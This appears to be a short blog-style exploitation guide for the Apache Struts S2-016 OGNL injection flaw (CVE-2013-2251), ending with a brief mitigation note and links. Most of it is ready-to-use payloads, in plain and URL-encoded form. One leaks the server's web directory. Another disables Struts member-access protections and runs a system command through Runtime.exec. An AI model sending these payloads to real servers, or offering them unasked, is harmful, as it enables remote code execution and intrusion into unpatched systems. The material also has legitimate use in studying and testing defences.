S2–016 (Apache Struts) Remote Code Execution Vulnerability

A remote users can execute an arbitrary code on the affected system. A remote user can conduct URL redirection attacks as well. A remote user can submit a URL with specially crafted ‘action:’, ‘redirect:’ or ‘redirectAction:’ parameter values to cause the system to evaluate the values as an OGNL expression and potentially execute arbitrary code on the target system [CVE-2013–2251]

Apache Struts (2.0.0 to 2.3.15) allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

Example-
http://[target]/struts2/login.action?redirect:http://www.google.com%25[exploit code]
http://[target]/struts2/login.action?redirect:$[exploit code]

Checking the Vulnerability-

Checking Vulnerability

Exploiting the Vulnerability-

Payload URL Encoding

GetWebDirectory-
redirect:${#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletReq’+’uest’),#resp=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletRes’+’ponse’),#resp.setCharacterEncoding(‘UTF-8’),#ot=#resp.getWriter (),#ot.print(‘web’),#ot.print(‘path:’),#ot.print(#req.getSession().getServletContext().getRealPath(‘/’)),#ot.flush(),#ot.close()}

http://<IP Address>/logout.action?redirect:http://www.google.com/%25%24%7b%23%72%65%71%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%71%27%2b%27%75%65%73%74%27%29%2c%23%72%65%73%70%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%73%27%2b%27%70%6f%6e%73%65%27%29%2c%23%72%65%73%70%2e%73%65%74%43%68%61%72%61%63%74%65%72%45%6e%63%6f%64%69%6e%67%28%27%55%54%46%2d%38%27%29%2c%23%6f%74%3d%23%72%65%73%70%2e%67%65%74%57%72%69%74%65%72%20%28%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%77%65%62%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%70%61%74%68%3a%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%23%72%65%71%2e%67%65%74%53%65%73%73%69%6f%6e%28%29%2e%67%65%74%53%65%72%76%6c%65%74%43%6f%6e%74%65%78%74%28%29%2e%67%65%74%52%65%61%6c%50%61%74%68%28%27%2f%27%29%29%2c%23%6f%74%2e%66%6c%75%73%68%28%29%2c%23%6f%74%2e%63%6c%6f%73%65%28%29%7d

Getting Web Directory

IPConfig-
redirect:${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#f=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ipconfig’).getInputStream())}

http://<IP Address>/logout.action?redirect:$%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%66%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%66%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%66%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%70%63%6f%6e%66%69%67%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%7d

IP Config Details

Mitigation-
The vendor has issued a fix (2.3.15.1). The vendor’s advisory is available at:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.htm

More Reading-
https://waf.ninja/struts2-vulnerability-evolution/#s2016